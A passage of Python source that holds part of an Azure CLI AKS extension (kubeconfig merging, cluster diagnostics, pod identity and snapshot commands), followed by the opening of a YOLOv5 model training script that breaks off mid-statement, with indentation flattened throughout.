if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(
cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(
cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id,
resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning(
"Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster',
str(len(ready_nodes)))
if not ready_nodes:
logger.warning(
'No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
"apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s',
node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s',
node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads(
'[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(
network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_kubelet_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError(
"Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get(
"cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get(
"cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get(
"imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get(
"imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get(
"topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get(
"allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
config_object.container_log_max_files = kubelet_config.get(
"containerLogMaxFiles", None)
config_object.container_log_max_size_mb = kubelet_config.get(
"containerLogMaxSizeMB", None)
config_object.pod_max_pids = kubelet_config.get(
"podMaxPids", None)
return config_object
def _get_linux_os_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError(
"Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get(
"transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get(
"transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError(
"Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get(
"netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get(
"netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get(
"netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get(
"netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get(
"netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get(
"netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get(
"netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get(
"netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get(
"netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get(
"netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get(
"netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get(
"netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get(
"netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get(
"netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get(
"netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get(
"netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get(
"netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get(
"netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get(
"netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get(
"netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get(
"fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get(
"kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get(
"vmVfsCachePressure", None)
return config_object
def _get_http_proxy_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
hp_config = get_file_json(file_path)
if not isinstance(hp_config, dict):
raise CLIError(
"Error reading Http Proxy Config at {}. Please see https://aka.ms/HttpProxyConfig for correct format.".format(file_path))
config_object = ManagedClusterHTTPProxyConfig()
config_object.http_proxy = hp_config.get("httpProxy", None)
config_object.https_proxy = hp_config.get("httpsProxy", None)
config_object.no_proxy = hp_config.get("noProxy", None)
config_object.trusted_ca = hp_config.get("trustedCa", None)
return config_object
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
binding_selector=None,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(
cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(
cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
if binding_selector is not None:
pod_identity.binding_selector = binding_selector
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError(
'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError('Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
def aks_egress_endpoints_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
return client.list_outbound_network_dependencies_endpoints(resource_group_name, name)
def aks_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
nodepool_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
creationData = CreationData(
source_resource_id=nodepool_id
)
snapshot = Snapshot(
name=name,
tags=tags,
location=location,
creation_data=creationData
)
headers = get_aks_custom_headers(aks_custom_headers)
return client.create_or_update(resource_group_name, name, snapshot, headers=headers)
def aks_snapshot_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, name)
return snapshot
def aks_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
no_wait=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'This will delete the snapshot "{}" in resource group "{}", Are you sure?'.format(name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, name)
def aks_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
|
train.py | """Train a YOLOv5 model on a custom dataset
Usage:
$ python path/to/train.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import logging
import os
import random
import sys
import time
import warnings
from copy import deepcopy
from pathlib import Path
from threading import Thread
import math
import numpy as np
import torch.distributed as dist
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.utils.data
import yaml
from torch.cuda import amp
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
FILE = Path(__file__).absolute()
sys.path.append(FILE.parents[0].as_posix()) # add yolov5/ to path
import val # for end-of-epoch mAP
from models.experimental import attempt_load
from models.yolo import Model
from utils.autoanchor import check_anchors
from utils.datasets import create_dataloader
from utils.general import labels_to_class_weights, increment_path, labels_to_image_weights, init_seeds, \
strip_optimizer, get_latest_run, check_dataset, check_file, check_git_status, check_img_size, \
check_requirements, print_mutation, set_logging, one_cycle, colorstr
from utils.google_utils import attempt_download
from utils.loss import ComputeLoss
from utils.plots import plot_images, plot_labels, plot_results, plot_evolution
from utils.torch_utils import ModelEMA, select_device, intersect_dicts, torch_distributed_zero_first, de_parallel
from utils.wandb_logging.wandb_utils import WandbLogger, check_wandb_resume
from utils.metrics import fitness
LOGGER = logging.getLogger(__name__)
LOCAL_RANK = int(os.getenv('LOCAL_RANK', -1)) # https://pytorch.org/docs/stable/elastic/run.html
RANK = int(os.getenv('RANK', -1))
WORLD_SIZE = int(os.getenv('WORLD_SIZE', 1))
def train(hyp, # path/to/hyp.yaml or hyp dictionary
opt,
device,
):
save_dir, epochs, batch_size, weights, single_cls, evolve, data, cfg, resume, noval, nosave, workers, = \
opt.save_dir, opt.epochs, opt.batch_size, opt.weights, opt.single_cls, opt.evolve, opt.data, opt.cfg, \
opt.resume, opt.noval, opt.nosave, opt.workers
# Directories
save_dir = Path(save_dir)
wdir = save_dir / 'weights'
wdir.mkdir(parents=True, exist_ok=True) # make dir
last = wdir / 'last.pt'
best = wdir / 'best.pt'
results_file = save_dir / 'results.txt'
# Hyperparameters
if isinstance(hyp, str):
with open(hyp) as f:
hyp = yaml.safe_load(f) # load hyps dict
LOGGER.info(colorstr('hyperparameters: ') + ', '.join(f'{k}={v}' for k, v in hyp.items()))
# Save run settings
with open(save_dir / 'hyp.yaml', 'w') as f:
yaml.safe_dump(hyp, f, sort_keys=False)
with open(save_dir / 'opt.yaml', 'w') as f:
yaml.safe_dump(vars(opt), f, sort_keys=False)
# Configure
plots = not evolve # create plots
cuda = device.type != 'cpu'
init_seeds(1 + RANK)
with open(data) as f:
data_dict = yaml.safe_load(f) # data dict
# Loggers
loggers = {'wandb': None, 'tb': None} # loggers dict
if RANK in [-1, 0]:
# TensorBoard
if not evolve:
prefix = colorstr('tensorboard: ')
LOGGER.info(f"{prefix}Start with 'tensorboard --logdir {opt.project}', view at http://localhost:6006/")
loggers['tb'] = SummaryWriter(str(save_dir))
# W&B
opt.hyp = hyp # add hyperparameters
run_id = torch.load(weights).get('wandb_id') if weights.endswith('.pt') and os.path.isfile(weights) else None
run_id = run_id if opt.resume else None # start fresh run if transfer learning
wandb_logger = WandbLogger(opt, save_dir.stem, run_id, data_dict)
loggers['wandb'] = wandb_logger.wandb
if loggers['wandb']:
data_dict = wandb_logger.data_dict
weights, epochs, hyp = opt.weights, opt.epochs, opt.hyp # may update weights, epochs if resuming
nc = 1 if single_cls else int(data_dict['nc']) # number of classes
names = ['item'] if single_cls and len(data_dict['names']) != 1 else data_dict['names'] # class names
assert len(names) == nc, '%g names found for nc=%g dataset in %s' % (len(names), nc, data) # check
is_coco = data.endswith('coco.yaml') and nc == 80 # COCO dataset
# Model
pretrained = weights.endswith('.pt')
if pretrained:
with torch_distributed_zero_first(RANK):
weights = attempt_download(weights) # download if not found locally
ckpt = torch.load(weights, map_location=device) # load checkpoint
model = Model(cfg or ckpt['model'].yaml, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
exclude = ['anchor'] if (cfg or hyp.get('anchors')) and not resume else [] # exclude keys
state_dict = ckpt['model'].float().state_dict() # to FP32
state_dict = intersect_dicts(state_dict, model.state_dict(), exclude=exclude) # intersect
model.load_state_dict(state_dict, strict=False) # load
LOGGER.info('Transferred %g/%g items from %s' % (len(state_dict), len(model.state_dict()), weights)) # report
else:
model = Model(cfg, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
with torch_distributed_zero_first(RANK):
check_dataset(data_dict) # check
train_path = data_dict['train']
val_path = data_dict['val']
# Freeze
freeze = [] # parameter names to freeze (full or partial)
for k, v in model.named_parameters():
v.requires_grad = True # train all layers
if any(x in k for x in freeze):
print('freezing %s' % k)
v.requires_grad = False
# Optimizer
nbs = 64 # nominal batch size
accumulate = max(round(nbs / batch_size), 1) # accumulate loss before optimizing
hyp['weight_decay'] *= batch_size * accumulate / nbs # scale weight_decay
LOGGER.info(f"Scaled weight_decay = {hyp['weight_decay']}")
pg0, pg1, pg2 = [], [], [] # optimizer parameter groups
for k, v in model.named_modules():
if hasattr(v, 'bias') and isinstance(v.bias, nn.Parameter):
pg2.append(v.bias) # biases
if isinstance(v, nn.BatchNorm2d):
pg0.append(v.weight) # no decay
elif hasattr(v, 'weight') and isinstance(v.weight, nn.Parameter):
pg1.append(v.weight) # apply decay
if opt.adam:
optimizer = optim.Adam(pg0, lr=hyp['lr0'], betas=(hyp['momentum'], 0.999)) # adjust beta1 to momentum
else:
optimizer = optim.SGD(pg0, lr=hyp['lr0'], momentum=hyp['momentum'], nesterov=True)
optimizer.add_param_group({'params': pg1, 'weight_decay': hyp['weight_decay']}) # add pg1 with weight_decay
optimizer.add_param_group({'params': pg2}) # add pg2 (biases)
LOGGER.info('Optimizer groups: %g .bias, %g conv.weight, %g other' % (len(pg2), len(pg1), len(pg0)))
del pg0, pg1, pg2
# Scheduler https://arxiv.org/pdf/1812.01187.pdf
# https://pytorch.org/docs/stable/_modules/torch/optim/lr_scheduler.html#OneCycleLR
if opt.linear_lr:
lf = lambda x: (1 - x / (epochs - 1)) * (1.0 - hyp['lrf']) + hyp['lrf'] # linear
else:
lf = one_cycle(1, hyp['lrf'], epochs) # cosine 1->hyp['lrf']
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
# plot_lr_scheduler(optimizer, scheduler, epochs)
# EMA
ema = ModelEMA(model) if RANK in [-1, 0] else None
# Resume
start_epoch, best_fitness = 0, 0.0
if pretrained:
# Optimizer
if ckpt['optimizer'] is not None:
optimizer.load_state_dict(ckpt['optimizer'])
best_fitness = ckpt['best_fitness']
# EMA
if ema and ckpt.get('ema'):
ema.ema.load_state_dict(ckpt['ema'].float().state_dict())
ema.updates = ckpt['updates']
# Results
if ckpt.get('training_results') is not None:
results_file.write_text(ckpt['training_results']) # write results.txt
# Epochs
start_epoch = ckpt['epoch'] + 1
if resume:
assert start_epoch > 0, '%s training to %g epochs is finished, nothing to resume.' % (weights, epochs)
if epochs < start_epoch:
LOGGER.info('%s has been trained for %g epochs. Fine-tuning for %g additional epochs.' %
(weights, ckpt['epoch'], epochs))
epochs += ckpt['epoch'] # finetune additional epochs
del ckpt, state_dict
# Image sizes
gs = max(int(model.stride.max()), 32) # grid size (max stride)
nl = model.model[-1].nl # number of detection layers (used for scaling hyp['obj'])
imgsz = check_img_size(opt.imgsz, gs, floor=gs * 2) # verify imgsz is gs-multiple
# DP mode
if cuda and RANK == -1 and torch.cuda.device_count() > 1:
logging.warning('DP not recommended, instead use torch.distributed.run for best DDP Multi-GPU results.\n'
